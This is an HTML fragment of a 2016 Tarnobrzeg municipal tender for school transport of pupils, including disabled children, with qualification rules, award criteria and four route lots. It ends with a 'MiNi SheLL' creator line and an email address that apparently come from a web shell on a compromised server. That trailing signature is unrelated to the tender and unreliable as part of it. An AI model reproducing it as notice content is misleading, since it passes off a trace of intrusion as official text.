</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas podstawienia pojazdu zastępczego - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy, w ramach tego samego środka   transportu, bez zmiany maksymalnej nominalnej wartości zobowiązania  zamawiającego wynikającej z umowy poprzez: 
    1) zmniejszenie liczby dowożonych dzieci w przypadku:
     a) rezygnacji z dowozu dziecka, 
     b) przeniesienia dziecka do innej placówki,
     2) zwiększenie liczby dowożonych dzieci,
a) zmianę rozkładu zajęć,
b) zmianę adresu zamieszkania dziecka.
 2. Zamawiający zastrzega także możliwość zmiany stawki podatku VAT z chwilą  wejście w życie stosownych przepisów, dotyczących zmian wysokości podatku od  towarów i usług, oraz związanej z tym faktem zmiany wysokości wynagrodzenia.
3.	Wszelkie zmiany treści umowy, o których mowa w pkt. 1 wymagają powiadomienia Wykonawcy i uzgodnienia z nim warunków ich wdrożenia oraz wymagają pod rygorem nieważności pisemnej formy w postaci aneksu podpisanego przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzega ul. Mickiewicza 7 pok.6 39-400 Tarnobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 10:00, miejsce: Kancelaria Ogólna Urząd Miasta Tarnobrzega ul. Mickiewicza 7 39-400 Tarnobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług przewozowych uczniów i dzieci do Szkoły Podstawowej nr 6, Przedszkola nr 6 i Zespołu Szkół Specjalnych w roku szkolnym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Nagnajów (kapliczka), Nagnajów (wiadukt), Szkoła Podstawowa Nr 6, - ul. Mickiewicza 86, Ocice I, II, III, IV,V,  Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Przedszkole Nr 6 - ul. 1 Maja 14, Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a
Przyjazd pod Zespół Szkół Specjalnych na godz. 8:00

Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a, Przedszkole Nr 6 - ul. 1 Maja 14, Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Ocice I, II, III, IV, V,  Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Nagnajów (wiadukt), Nagnajów  (kapliczka),
Wyjazd z Zespołu Szkół Specjalnych o godz. 14:30

27 osób + 1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 6 - 21 osób,
Przedszkole nr 6 - 1 osoba
Zespół Szkól Specjalnych - 5 osób

Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego  w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.12.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług przewozowych uczniów i dzieci do Szkoły Podstawowej nr 9 w roku szkolnym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Ul. Warszawska (KOGA), ul. Warszawska 227 (Magdalena), ul. Warszawska (OSP-Zakrzów), 
ul. Przemysłowa (Przedszkole - Zakrzów), ul. Warszawska, Szkoła Podstawowa nr 9 - ul. Wiejska 4 
Przyjazd pod szkołę na godz.8:00
Odwóz I- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9 - ul. Wiejska 4, ul. Warszawska, ul. Przemysłowa (Przedszkole- Zakrzów), ul. Warszawska (OSP-Zakrzów), ul. Warszawska 227 (Magdalena), Ul. Warszawska (KOGA),
Wyjazd ze szkoły o godz. 13:50
Odwóz II- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9 - ul. Wiejska 4, ul. Warszawska, ul. Przemysłowa (Przedszkole- Zakrzów), ul. Warszawska (OSP-Zakrzów), ul. Warszawska 227 (Magdalena), Ul. Warszawska (KOGA),
Wyjazd ze szkoły o godz. 15:40

36 osób + 1 opiekun;  min. 36 miejsc siedzących 
Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie - przywóz i odwóz dzieci wraz z opiekunami - z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.12.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług przewozowych uczniów i dzieci do, Szkoły Podstawowej nr 9, Przedszkola nr 9,  Zespołu Szkół Specjalnych i Gimnazjum nr 2 w roku szkolnym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Skalna Góra, Plac Tysiąclecia (rondo), ul. 1 Maja (Tapima), ul. Moniuszki (Stokrotka), 
ul. Wyspiańskiego (US), ul. Kopernika I, ul. Kopernika II (przy G2),  ul. Sienkiewicza 63,  ul. Sikorskiego, ul. Zwierzyniecka (przy Żabce), Zespół Szkół Specjalnych - ul. Dąbrowskiej 10a, Szkoła Podstawowa nr 9, Przedszkole nr 9 - Wiejska 4;
Przyjazd do  Sp9, P9- 8:00

Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9, Przedszkole nr 9- Wiejska 4; Zespół Szkół Specjalnych -ul. Dąbrowskiej 10a, Zwierzyniecka (przy Żabce), ul. Sikorskiego,  ul. Sienkiewicza 63, ul. Kopernika II (przy G2), Kopernika I, Wyspiańskiego (US), ul. Moniuszki (Stokrotka), ul. 1 Maja (Tapima),  Plac Tysiąclecia (rondo), ul. Skalna Góra.
Wyjazd z Sp9, P9 o godz. 15:00

21 osób, w tym 3 osoby na wózkach inwalidzkich +1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 9 - 11osób, w tym 2 osoby na wózku inwalidzkim,
Przedszkole nr 9 - 6 osób,
Zespół Szkół Specjalnych - 3 osoby,
Gimnazjum Nr 2 - 1 osoba na wózku

Okres ferii zimowych, wakacji, przerw świątecznych - do 39 kursów  
Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Skalna Góra, ul. Wyspiańskiego (US), ul. Kopernika I, ul. Kopernika II ul. Sienkiewicza 63, Zespół Szkół Specjalnych- Dąbrowskiej 10a, ul. Zwierzyniecka (Żabka),  Przedszkole nr 9 - ul. Wiejska 4;
Przyjazd do P9- 8:00
Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Przedszkole nr 9- Wiejska 4, ul. Zwierzyniecka (Żabka), Zespół Szkół Specjalnych- Dąbrowskiej 10a, ul. Sienkiewicza 63, ul. Kopernika II, ul. Kopernika I, ul. Wyspiańskiego (US), ul. Skalna Góra, 
Wyjazd z  P9 godz. 13:00-15:00
6 osób + 1 opiekun;    
Dojazd w ferie, przerwy świąteczne i wakacje wg potrzeby placówki.
Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany  do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy  z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz  z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zobowiązany jest do ujęcia w cenie do 39 dodatkowych kursów podczas ferii zimowych, wakacji - placówka nieferyjna Przedszkole nr 9 wg potrzeb placówki.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.12.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług przewozowych uczniów i dzieci do Zespołu Szkół Specjalnych i Szkoły Podstawowej nr 9 w roku szkolnym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Zamkowa, ul. Sienkiewicza, al. Warszawska (przy cmentarzu), ul. Warszawska (przystanek oś Zakrzów przy numerze 201), ul. Jana Słomki, ul. Wiejska 4 (przy Szkole Podstawowej nr 9), Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a 
Przyjazd pod szkołę- Zespół Szkól Specjalnych na godz.8:00
Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a, ul. Wiejska 4 (przy Szkole Podstawowej nr 9), ul. Jana Słomki, ul. Warszawska (przystanek oś Zakrzów przy numerze 201), al. Warszawska (przy cmentarzu), ul. Sienkiewicza, ul. Zamkowa 37, 
Wyjazd z Zespołu Szkół Specjalnych  o godz. 14:30;
11 osób, w tym 1 osoba na wózku inwalidzkim + 1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 9 - 1 osoba, 
Zespół Szkół Specjalnych - 10 osób, w tym 1 osoba na wózku

Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.12.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com